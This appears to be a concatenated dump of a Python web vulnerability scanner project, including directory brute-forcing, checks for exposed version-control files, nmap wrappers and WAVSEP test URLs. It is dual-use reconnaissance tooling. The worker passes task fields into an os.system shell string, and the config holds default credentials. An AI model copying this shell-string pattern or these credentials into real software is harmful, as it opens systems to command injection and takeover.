12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /teye_web/wavsep/false_sql_url.txt: -------------------------------------------------------------------------------- 1 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 2 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 3 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case03-FalsePositiveInjectionInLogin-PsAndIv-200ErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 4 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case04-FalsePositiveInjectionInLogin-PsAndIv-200SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 5 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case05-FalsePositiveInjectionInLogin-PsAndIv-Different200ValidOnIvFailure.jsp?username=textvalue&password=textvalue2 6 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=textvalue&password=textvalue2 7 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=textvalue&password=textvalue2 8 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case08-FalsePositiveInjectionInLogin-PsAndIv-200ErrorOnUnrelatedSyntaxError.jsp?username=textvalue&password=textvalue2 9 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case09-FalsePositiveInjectionInUpdate-PsAndIv-Different200ValidOnIvFailure.jsp?transactionDate=2010-02-02 10 | http://192.168.1.105:8080/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case10-FalsePositiveInjectionInUpdate-PsAndIv-Identical200Response.jsp?transactionDate=2010-02-02 11 | 12 | -------------------------------------------------------------------------------- /teye_util/page_404.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | import sys 4 | sys.path.append("/Users/imiyoo/workplace/tscanner") 5 | 6 | from wCurl import wcurl 7 | 8 | from teye_web.http.URL import URL 9 | from teye_web.http.function import is_similar_page 10 | from misc.common import rand_letters 11 | 12 | 13 | class page_404: 14 | ''' 15 | ''' 16 | _instance = None 17 | 18 | def __init__(self): 19 | 20 | self._404_already_domain = [] 21 | 22 | self._404_kb = [] 23 | 24 | self._404_code_list=[200,301,302] 25 | 26 | 27 | def generate_404_kb(self,url): 28 | ''' 29 | ''' 30 | domain = url.get_domain() 31 | domain_path = url.get_domain_path() 32 | rand_file = rand_letters(8) + '.html' 33 | url_404 = domain_path.urljoin(rand_file) 34 | resp_200 =wcurl.get(domain_path) 35 | resp_404 = wcurl.get(url_404) 36 | 37 | if is_similar_page(resp_200,resp_404): 38 | #404页面与正常页面相同 39 | pass 40 | else: 41 | self._404_already_domain.append(domain) 42 | self._404_kb.append((domain,resp_404)) 43 | 44 | 45 | def set_check(self): 46 | ''' 47 | ''' 48 | self._404_kb = [] 49 | self._404_checked = False 50 | 51 | def is_404(self,http_response): 52 | ''' 53 | ''' 54 | code = http_response.get_code() 55 | 56 | url = http_response.get_url() 57 | 58 | domain = url.get_domain() 59 | 60 | if domain not in self._404_already_domain: 61 | self.generate_404_kb(url) 62 | 63 | if code == 404: 64 | return True 65 | 66 | if code in self._404_code_list: 67 | for domain_404,resp_404 in self._404_kb: 68 | if domain == domain_404: 69 | if is_similar_page(http_response,resp_404): 70 | return True 71 | 72 | return False 73 | 74 | def is_404(http_response): 75 | if page_404._instance is None: 76 | page_404._instance = page_404() 77 | return page_404._instance.is_404(http_response) 78 | 79 | 80 | if __name__=="__main__": 81 | url="http://www.baidu.com/44444.html" 82 | res = wcurl.get(url) 83 | 84 | 85 | if is_404(res): 86 | print "404" 87 | #print res.body 88 | -------------------------------------------------------------------------------- /teye_web/http/function.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | from teye_web.http.URL import URL 4 | from hashes.simhash import simhash 5 | 6 | def is_contain_list(a_list,b_list): 7 | ''' 8 | >>>a_list=['a','b','c'] 9 | >>>b_list=['c','a','b'] 10 | ''' 11 | if not isinstance(a_list,list) or not isinstance(b_list,list): 12 | return False 13 | 14 | a_len = len(a_list) 15 | b_len = len(b_list) 16 | 17 | if a_len != b_len: 18 | return False 19 | 20 | if a_len >= b_len: 21 | temp = a_list 22 | a_list = b_list 23 | b_list = temp 24 | 25 | a_len_real = len(a_list) 26 | b_len_real = len(b_list) 27 | 28 | #判断两个List是否相同或包含 29 | count = 0 30 | for a in a_list: 31 | if a in b_list: 32 | count = count + 1 33 | 34 | if count == a_len_real and count<=b_len_real: 35 | return True 36 | else: 37 | return False 38 | 39 | def is_similar_url(url1,url2): 40 | ''' 41 | :param url1: 42 | :param url2: 43 | :return: 44 | ''' 45 | if not isinstance(url1,URL): 46 | url1 = URL(url1) 47 | 48 | if not isinstance(url2,URL): 49 | url2 = URL(url2) 50 | 51 | url1_str = url1.get_uri_string() 52 | url2_str = url2.get_uri_string() 53 | 54 | qs1 = url1.get_querystring().keys() 55 | qs2 = url2.get_querystring().keys() 56 | 57 | if url1_str==url2_str and is_contain_list(qs1,qs2): 58 | #print "%s=%s" % (url1,url2) 59 | return True 60 | else: 61 | return False 62 | 63 | def is_similar_page(res1,res2,radio=0.85): 64 | ''' 65 | ''' 66 | if res1 is None or res2 is None: 67 | return False 68 | 69 | body1 = res1.body 70 | body2 = res2.body 71 | 72 | url1 = res1.get_url() 73 | url2 = res2.get_url() 74 | 75 | simhash1 = simhash(body1.split()) 76 | simhash2 = simhash(body2.split()) 77 | 78 | calc_radio = simhash1.similarity(simhash2) 79 | #print "[%s]与[%s]两个页面的相似度为:%s" % (url1,url2,calc_radio) 80 | if calc_radio > radio: 81 | return True 82 | else: 83 | return False 84 | -------------------------------------------------------------------------------- /scan_traffic.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | scan_traffic.py 4 | ''' 5 | import os 6 | import re 7 | import sys 8 | from teye_web.http.URL import URL 9 | from teye_web.http.Request import Request 10 | from teye_web.http.cookie import cookie 11 | from teye_web.http.postdata import postdata 12 | 13 | 14 | from BaseHTTPServer import BaseHTTPRequestHandler 15 | from StringIO import StringIO 16 | 17 | class HTTPRequest(BaseHTTPRequestHandler): 18 | def __init__(self, request_text): 19 | self.rfile = StringIO(request_text) 20 | self.raw_requestline = self.rfile.readline() 21 | self.error_code = self.error_message = None 22 | self.parse_request() 23 | 24 | def read_request(str): 25 | ''' 26 | ''' 27 | rlist = str.split("\n\nHTTP/1.1") 28 | req_str = rlist[0].strip() 29 | 30 | if req_str.startswith("HTTP/1.1"): 31 | return None 32 | 33 | basereq = HTTPRequest(req_str) 34 | method =basereq.command 35 | urlpath =basereq.path 36 | headers =basereq.headers 37 | netloc =basereq.headers['host'] 38 | del headers['host'] 39 | 40 | url = URL(netloc + urlpath) 41 | treq = Request(url,method,headers=headers) 42 | return treq 43 | 44 | def convert_traffic_to_req(http_file): 45 | ''' 46 | ''' 47 | req_list = [] 48 | file=open(http_file,"rb") 49 | content = file.read() 50 | #[172.24.72.136:62822] -- -- --> [10.46.7.223:80] 51 | pattern="\[\d+\.\d+\.\d+.\d+:\d+\]\s--\s--\s-->\s\[\d+\.\d+\.\d+\.\d+:\d+\]" 52 | match = re.split(pattern,content) 53 | 54 | if len(match)>1: 55 | for i in xrange(len(match)-1): 56 | index = i + 1 57 | data = match[index] 58 | req = read_request(data) 59 | if req is not None and req not in req_list: 60 | req_list.append(req) 61 | return req_list 62 | 63 | pcap_file = "test.pcap" 64 | http_file ="http_"+pcap_file.split(".")[0] + ".log" 65 | #利用httpcap对PCAP文件进行解析和过滤 66 | cmd = "parse_pcap -vv %s > %s" % (pcap_file,http_file) 67 | os.system(cmd) 68 | req_list = convert_traffic_to_req(http_file) 69 | for item in req_list: 70 | print item 71 | from teye_core.tcore import tCore 72 | scan_engine = tCore() 73 | scan_engine.scan_request(item) 74 | 75 | -------------------------------------------------------------------------------- /teye_web/wavsep/false_lfi_url.txt: -------------------------------------------------------------------------------- 1 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 2 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case02-LFI-FalsePositive-OpenRedirect-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 3 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case03-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-WhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=validfile1.jsp 4 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case04-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-TraversalRemovalAndWhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=validfile1.jsp 5 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case05-LFI-FalsePositive-ContextStream-TextHtmlValidResponse-FilenameContext-WhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 6 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case06-LFI-FalsePositive-ContextStream-TextHtmlValidResponse-FilenameContext-TraversalRemovalAndWhiteList-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=/active/LFI/LFI-FalsePositives-GET/validfile1.jsp 7 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.0\webapps\wavsep\active\LFI\LFI-FalsePositives-GET\content.ini 8 | http://192.168.1.105:8080/wavsep/active/LFI/LFI-FalsePositives-GET/Case08-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-InputNotUsed-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.0\webapps\wavsep\active\LFI\LFI-FalsePositives-GET\content.ini 9 | 10 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_banner_ports.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /teye_report/HtmlReport.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | HtmlReport.py 4 | ''' 5 | import sys 6 | import teye_config as Settings 7 | 8 | import json 9 | import time 10 | 11 | class HtmlReport: 12 | ''' 13 | ''' 14 | def __init__(self,db_info=None,model="SITE"): 15 | ''' 16 | ''' 17 | if model=="SITE": 18 | self._report_template = Settings.ROOT_PATH + "/teye_report/template/WAT_SITE_Report_For_Test_V1.html" 19 | elif model=="MAPP": 20 | self._report_template = Settings.ROOT_PATH + "/teye_report/template/WAT_MAPP_Report_For_Test_V1.html" 21 | 22 | 23 | print Settings.ROOT_PATH 24 | self._report_dir = Settings.ROOT_PATH + "/teye_report/template/" 25 | 26 | self._db_info = db_info 27 | 28 | self._apiinfos = [] 29 | self._vulntypes = [] 30 | self._vulninfos = [] 31 | self._infos = {} 32 | 33 | self._vulnids = [] 34 | 35 | def set_report_info(self,target,date_string=""): 36 | ''' 37 | ''' 38 | if date_string=="": 39 | self._infos["date"]=time.strftime('%a %b %d %X %Y',time.localtime(time.time())) 40 | self._infos["target"] = target 41 | 42 | def generate(self,filename): 43 | ''' 44 | report_data = {"entry":"www.watscan.com", 45 | "scan_target":["10.10.10.10","app.watscan.com","test.watscan.com"], 46 | "ipaddr":"10.10.10.10", 47 | "port":[], 48 | "domain":"baidu.com", 49 | "relate_ipaddr":[], 50 | "finger":"", 51 | "nameserver":[], 52 | "subdomain":[], 53 | "dir":[], 54 | "vuln":[{ 55 | "site":"www.watscan.com", 56 | "vlist": 57 | [ 58 | { 59 | "name":"SQL注入漏洞", 60 | "list": 61 | [ 62 | {"url":"http://www.watscan.com/index.php?id=1","risk":"高危","method":"GET"} 63 | ] 64 | } 65 | ] 66 | }] 67 | }; 68 | ''' 69 | report_dict = json.loads(str(self._db_info)) 70 | 71 | json_data = json.dumps(report_dict) 72 | 73 | fd = open(self._report_template,"r+") 74 | html_data = fd.read() 75 | html_data = html_data.replace("#___JSON_DATA___#",json_data) 76 | fd.close() 77 | 78 | filepath = self._report_dir+time.strftime('%Y-%m-%d',time.localtime(time.time()))+"_"+filename 79 | fd_new = open(filepath,"w+") 80 | fd_new.write(html_data) 81 | fd_new.close() 82 | -------------------------------------------------------------------------------- /teye_worker/scan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | scan.py 4 | ''' 5 | import sys 6 | sys.path.append("..") 7 | import teye_config as Settings 8 | 9 | from celery import Celery 10 | from celery import platforms 11 | 12 | import os 13 | import uuid 14 | import platform 15 | import hashlib 16 | import time 17 | import datetime 18 | import json 19 | 20 | #import subprocess 21 | from LogManager import log 22 | from RDB import RDB 23 | 24 | #ROOT启动 25 | #platforms.C_FORCE_ROOT = True 26 | #每个worker执行了多少任务就会死掉 27 | #CELERYD_MAX_TASKS_PER_CHILD = 40 28 | 29 | BROKER_URL='redis://127.0.0.1:6379/0' 30 | app = Celery('scan',broker=BROKER_URL) 31 | #app.config_from_object('scan.config') 32 | 33 | ''' 34 | class CountTask(celery.Task): 35 | count = 0 36 | 37 | def on_success(self, retval, task_id, args, kwargs): 38 | self.count += 1 39 | return self.count 40 | ''' 41 | 42 | @app.task(ignore_result=True) 43 | def DoScanTask(msg_info): 44 | log.info("TScanner Get the Msg From the Task Queue") 45 | msg_json = json.loads(msg_info) 46 | website= msg_json.get("website") 47 | taskid= int(msg_json.get("taskid")) 48 | profile = msg_json.get("profile") 49 | taskstarttime = datetime.datetime.now() 50 | if platform.system().lower()=="linux": 51 | cmd="timeout %s %s %s -t %d -s '%s' -p '%s' -m 'teye'" % (Settings.MAX_SCAN_TIME,Settings.PYTHON_ENV,Settings.TEYE_PY_PATH,taskid,website,profile) 52 | else: 53 | cmd="%s %s -t %d -s '%s' -p '%s' -m 'teye'" % (Settings.PYTHON_ENV,Settings.TEYE_PY_PATH,taskid,website,profile) 54 | 55 | print cmd 56 | log.info(cmd) 57 | #ret = subprocess.call(cmd) 58 | ret= os.system(cmd) 59 | #ret=0 success 60 | if ret!=0: 61 | log.error("Error DoScanTask:%s" % cmd) 62 | rdb = RDB() 63 | rdb.connect() 64 | taskendtime = datetime.datetime.now() 65 | rdb.updateProgress(taskid,100) 66 | rdb.updateFinish(taskid,taskendtime) 67 | rdb.close() 68 | return False 69 | 70 | rdb = RDB() 71 | rdb.connect() 72 | taskendtime = datetime.datetime.now() 73 | rdb.updateFinish(taskid,taskendtime) 74 | rdb.close() 75 | log.info("Scan Website:"+website + " Spend Time:"+str(taskendtime-taskstarttime)) 76 | return True 77 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/check_fqp_nmap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from libnmap.process import NmapProcess 3 | from libnmap.parser import NmapParser, NmapParserException 4 | 5 | 6 | # start a new nmap scan on localhost with some specific options 7 | def do_scan(targets, options, fqp=None): 8 | parsed = None 9 | nm = NmapProcess(targets, options, fqp=fqp) 10 | rc = nm.run() 11 | if rc != 0: 12 | print("nmap scan failed: {0}".format(nm.stderr)) 13 | 14 | try: 15 | parsed = NmapParser.parse(nm.stdout) 16 | except NmapParserException as e: 17 | print("Exception raised while parsing scan: {0}".format(e.msg)) 18 | 19 | return parsed 20 | 21 | 22 | # print scan results from a nmap report 23 | def print_scan(nmap_report): 24 | print("Starting Nmap {0} ( http://nmap.org ) at {1}".format( 25 | nmap_report.version, 26 | nmap_report.started)) 27 | 28 | for host in nmap_report.hosts: 29 | if len(host.hostnames): 30 | tmp_host = host.hostnames.pop() 31 | else: 32 | tmp_host = host.address 33 | 34 | print("Nmap scan report for {0} ({1})".format( 35 | tmp_host, 36 | host.address)) 37 | print("Host is {0}.".format(host.status)) 38 | print(" PORT STATE SERVICE") 39 | 40 | for serv in host.services: 41 | pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format( 42 | str(serv.port), 43 | serv.protocol, 44 | serv.state, 45 | serv.service) 46 | if len(serv.banner): 47 | pserv += " ({0})".format(serv.banner) 48 | print(pserv) 49 | print(nmap_report.summary) 50 | 51 | 52 | if __name__ == "__main__": 53 | report = do_scan("127.0.0.1", "-sT") 54 | print_scan(report) 55 | # test with full path to bin 56 | # /usr/bin/nmap 57 | report = do_scan("127.0.0.1", "-sT", fqp="/usr/bin/nmap") 58 | print_scan(report) 59 | # /usr/bin/lol --> will throw exception 60 | try: 61 | report = do_scan("127.0.0.1", "-sV", fqp="/usr/bin/lol") 62 | print("lolbin") 63 | print_scan(report) 64 | except Exception as exc: 65 | print(exc) 66 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_banner_ports_notsyn.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /teye_dir/DirScan.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | DirScan.py 4 | ''' 5 | import os 6 | import sys 7 | 8 | # 加载配置文件 9 | sys.path.append("..") 10 | import teye_config as Settings 11 | 12 | import re 13 | import time 14 | from misc.common import is_404 15 | from wCurl import wcurl 16 | from LogManager import log 17 | 18 | 19 | class DirScan: 20 | ''' 21 | ''' 22 | 23 | def __init__(self): 24 | ''' 25 | ''' 26 | self._found_dir = [] 27 | 28 | self._dir_file = None 29 | 30 | def scan_dir(self, site, dir_file=None): 31 | ''' 32 | ''' 33 | self._dir_file = dir_file if dir_file else Settings.DIR_WEB_FILE 34 | 35 | file_list = open(self._dir_file, "rb").readlines() 36 | 37 | for item in file_list: 38 | path = item.strip() 39 | 40 | if path.startswith("#"): 41 | continue 42 | 43 | if site.endswith("/"): 44 | url = site[0:-1] + path 45 | else: 46 | url = site + path 47 | 48 | res = None 49 | 50 | try: 51 | res = wcurl.get(url, allow_redirects=False) 52 | 53 | status = res.get_code() 54 | 55 | if status is None: 56 | break 57 | 58 | msg = "Check URL:" + url + " code:" + str(status) 59 | log.info(msg) 60 | 61 | if status == 200: 62 | # unicode 63 | body = res.body 64 | 65 | if not is_404(body): 66 | msg = "Found URL:" + url + " code:" + str(status) + " 404 Check: False" 67 | print msg 68 | self._found_dir.append(url) 69 | 70 | if status == 301 or status == 302: 71 | next_res = wcurl.get(url, allow_redirects=True) 72 | if next_res.get_code() == 200: 73 | body = res.body 74 | if not is_404(body): 75 | msg = "Found URL:" + url + " code:" + str(status) + " 404 Check: False" 76 | print msg 77 | self._found_dir.append(url) 78 | 79 | except Exception, e: 80 | print "Http Request Error %s" % str(e) 81 | 82 | time.sleep(0.1) 83 | 84 | def get_dir_file(self): 85 | ''' 86 | ''' 87 | return self._found_dir 88 | 89 | 90 | if __name__ == "__main__": 91 | ''' 92 | ''' 93 | url = sys.argv[1] 94 | 95 | print url 96 | 97 | dir_scan = DirScan() 98 | 99 | try: 100 | dir_scan.scan_dir(url) 101 | except Exception, e: 102 | print str(e) 103 | print "发现的目录和文件:" 104 | print dir_scan.get_dir_file() 105 | -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/es.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import json 4 | from libnmap.reportjson import ReportEncoder 5 | from libnmap.plugins.backendplugin import NmapBackendPlugin 6 | from elasticsearch import Elasticsearch 7 | from datetime import datetime 8 | 9 | 10 | class NmapElasticsearchPlugin(NmapBackendPlugin): 11 | """ 12 | This class enables the user to store and manipulate nmap reports \ 13 | in a elastic search db. 14 | """ 15 | def __init__(self, index=None): 16 | if index is None: 17 | self.index = "nmap.{0}".format(datetime.now().strftime('%Y-%m-%d')) 18 | else: 19 | self.index = index 20 | self._esapi = Elasticsearch() 21 | 22 | def insert(self, report, doc_type=None): 23 | """ 24 | insert NmapReport in the backend 25 | :param NmapReport: 26 | :return: str the ident of the object in the backend for 27 | future usage 28 | or None 29 | """ 30 | if doc_type is None: 31 | doc_type = 'NmapReport' 32 | j = json.dumps(report, cls=ReportEncoder) 33 | res = self._esapi.index( 34 | index=self.index, 35 | doc_type=doc_type, 36 | body=json.loads(j)) 37 | rc = res['_id'] 38 | return rc 39 | 40 | def delete(self, id): 41 | """ 42 | delete NmapReport if the backend 43 | :param id: str 44 | """ 45 | raise NotImplementedError 46 | 47 | def get(self, id): 48 | """ 49 | retreive a NmapReport from the backend 50 | :param id: str 51 | :return: NmapReport 52 | """ 53 | res = self._esapi.get(index=self.index, 54 | doc_type="NmapReport", 55 | id=id)['_source'] 56 | return res 57 | 58 | def getall(self, filter=None): 59 | """ 60 | :return: collection of tuple (id,NmapReport) 61 | :param filter: Nice to have implement a filter capability 62 | """ 63 | rsearch = self._esapi.search(index=self.index, 64 | body={"query": {"match_all": {}}}) 65 | print("--------------------") 66 | print(type(rsearch)) 67 | print(rsearch) 68 | print("------------") 69 | -------------------------------------------------------------------------------- /teye_web/ver.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | ver.py 4 | ''' 5 | import re 6 | import os 7 | import sys 8 | import copy 9 | import teye_data.severity as severity 10 | from teye_data.vuln import vuln 11 | from teye_data.vulnmanager import vm 12 | 13 | from LogManager import log 14 | 15 | # wCurl 16 | from wCurl import wcurl 17 | from http.URL import URL 18 | from http.Request import Request 19 | 20 | import requests 21 | 22 | from util.gen_zip_name import gen_zip_name 23 | 24 | from misc.common import is_404 25 | 26 | 27 | class ver: 28 | ''' 29 | ''' 30 | 31 | def __init__(self): 32 | ''' 33 | ''' 34 | self._already_flag = False 35 | 36 | self._already_check_domain = [] 37 | 38 | self._ver_file = [".svn/wc.db", ".svn/entries", ".git/index"] 39 | 40 | self._ver_content_type = "application/octet-stream" 41 | 42 | def check(self, t_request): 43 | ''' 44 | ''' 45 | http_request = copy.deepcopy(t_request) 46 | url_obj = http_request.get_url() 47 | domain = url_obj.get_domain() 48 | 49 | if self._already_flag: 50 | return 51 | 52 | if domain not in self._already_check_domain: 53 | self._already_check_domain.append(domain) 54 | self._already_flag = True 55 | 56 | log.info(u"正在检测目标是否存在版本文件漏洞...") 57 | uri_string = url_obj.get_uri_string() 58 | 59 | for item in self._ver_file: 60 | ver_url = URL(uri_string).urljoin(item) 61 | res = requests.head(ver_url) 62 | ver_ct = res.headers["content-type"].lower() 63 | # ("wc.db|entries|index","application/octet-stream") 64 | if ver_ct == self._ver_content_type: 65 | v = vuln() 66 | v.set_url(ver_url) 67 | v.set_method("GET") 68 | v.set_param("") 69 | v.set_name("Ver Vuln") 70 | v.set_rank(severity.H) 71 | vm.append(self, http_request.get_url().get_host(), "ver", v) 72 | log.info("Ver Vuln") 73 | print "Ver Vuln 漏洞URL:%s" % (ver_url) 74 | 75 | def get_name(self): 76 | ''' 77 | ''' 78 | return "teye_ver_plugin" 79 | 80 | 81 | if __name__ == "__main__": 82 | ''' 83 | ''' 84 | ver_url = "http://192.168.126.142/book/ver/" 85 | req = Request(ver_url) 86 | t_scanner = ver() 87 | t_scanner.check(req) 88 | print vm.get_all_vuln() 89 | -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/cpe.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | 4 | class CPE(object): 5 | """ 6 | CPE class offers an API for basic CPE objects. 7 | These objects could be found in NmapService or in tag 8 | within NmapHost. 9 | 10 | :todo: interpret CPE string and provide appropriate API 11 | """ 12 | def __init__(self, cpestring): 13 | self._cpestring = cpestring 14 | self.cpedict = {} 15 | 16 | zk = ['cpe', 'part', 'vendor', 'product', 'version', 17 | 'update', 'edition', 'language'] 18 | self._cpedict = dict((k, '') for k in zk) 19 | splitup = cpestring.split(':') 20 | self._cpedict.update(dict(zip(zk, splitup))) 21 | 22 | @property 23 | def cpestring(self): 24 | """ 25 | Accessor for the full CPE string. 26 | """ 27 | return self._cpestring 28 | 29 | def __repr__(self): 30 | return self._cpestring 31 | 32 | def get_part(self): 33 | """ 34 | Returns the cpe part (/o, /h, /a) 35 | """ 36 | return self._cpedict['part'] 37 | 38 | def get_vendor(self): 39 | """ 40 | Returns the vendor name 41 | """ 42 | return self._cpedict['vendor'] 43 | 44 | def get_product(self): 45 | """ 46 | Returns the product name 47 | """ 48 | return self._cpedict['product'] 49 | 50 | def get_version(self): 51 | """ 52 | Returns the version of the cpe 53 | """ 54 | return self._cpedict['version'] 55 | 56 | def get_update(self): 57 | """ 58 | Returns the update version 59 | """ 60 | return self._cpedict['update'] 61 | 62 | def get_edition(self): 63 | """ 64 | Returns the cpe edition 65 | """ 66 | return self._cpedict['edition'] 67 | 68 | def get_language(self): 69 | """ 70 | Returns the cpe language 71 | """ 72 | return self._cpedict['language'] 73 | 74 | def is_application(self): 75 | """ 76 | Returns True if cpe describes an application 77 | """ 78 | return (self.get_part() == '/a') 79 | 80 | def is_hardware(self): 81 | """ 82 | Returns True if cpe describes a hardware 83 | """ 84 | return (self.get_part() == '/h') 85 | 86 | def is_operating_system(self): 87 | """ 88 | Returns True if cpe describes an operating system 89 | """ 90 | return (self.get_part() == '/o') 91 | -------------------------------------------------------------------------------- /teye_config.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | teye_config.py 4 | ''' 5 | import os 6 | import sys 7 | #Env Settings 8 | #ROOT_PATH='/Users/imiyoo/workplace/tscanner' 9 | 10 | #获取当前配置文件的绝对路径 11 | ROOT_PATH = os.path.dirname(os.path.realpath(__file__)) 12 | LIB_PATH = ROOT_PATH + '/thirdparty/' 13 | 14 | #加载关键路径 15 | sys.path.append(ROOT_PATH) 16 | sys.path.append(LIB_PATH) 17 | 18 | #File&Path Settings 19 | DOMAIN_FILE = ROOT_PATH + '/teye_file/domain/small_domain_name.txt' 20 | DIR_HOST_FILE = ROOT_PATH + '/teye_file/webdir/host.lst' 21 | DIR_WEB_FILE = ROOT_PATH + '/teye_file/webdir/web.lst' 22 | FINGER_FILE = ROOT_PATH + '/teye_file/finger/app.db' 23 | 24 | #Env Path Settings 25 | TEYE_PY_PATH = ROOT_PATH + '/teye.py' 26 | NMAP_PATH ='/usr/bin/nmap' 27 | PYTHON_ENV ='/usr/bin/python' 28 | 29 | #SqlHelper Settings 30 | class Configuration: 31 | SQLALCHEMY_DATABASE_URI = 'sqlite://///Users/imiyoo/workplace/tscanner_for_github/teye_files/db/scan.db' 32 | 33 | class DevelopmentConfiguration(Configuration): 34 | pass 35 | 36 | class ProductConfiguration(Configuration): 37 | pass 38 | 39 | 40 | _config_table = { 41 | 'default': DevelopmentConfiguration, 42 | 'develope': DevelopmentConfiguration, 43 | 'product': ProductConfiguration, 44 | } 45 | 46 | 47 | #Database Settings 48 | WAT_Host='X.X.X.X' #database host info 49 | WAT_Database='wat' #database name info 50 | WAT_User='root' #database user info 51 | WAT_Pass='root' #database pass info 52 | 53 | #Activemq Settings 54 | ACTIVEMQ_ADDRESS="tcp://X.X.X.X:61617" 55 | ACTIVEMQ_IP='X.X.X.X' 56 | ACTIVEMQ_PORT='61617' 57 | ACTIVEMQ_WATSERVER_QUEUE='/queue/WATSERVER' 58 | ACTIVEMQ_WATCLIENT_QUEUE='/queue/WATCLIENT' 59 | ACTIVEMQ_WATAPP_QUEUE='/queue/WATAPP' 60 | ACTIVEMQ_USER='system' 61 | ACTIVEMQ_PASSWORD='manager' 62 | 63 | 64 | #Rpc Settings 65 | RPYC_HOST="X.X.X.X" 66 | RPYC_PORT=8888 67 | 68 | 69 | #Dispatch Settings 70 | MSG_INTERVAL=1 71 | BIG_MSG_INTERVAL=1*60 72 | RECV_MSG_TIME_IDLE =30 73 | MAX_SCAN_TIME = 2*60*60 74 | MAX_CONCURRENT_NUM = 2 75 | MAX_DISPATCH_TASK = 10 76 | MAX_RETRY_COUNT = 5 77 | RETRY_INTERVAL = 1 78 | SCAN_TASK_INTERVAL = 60 79 | DISPATCH_TASK_INTERVAL= 10 80 | 81 | 82 | #COMMON VULNS 83 | SQL_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=1" 84 | XSS_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=2" 85 | 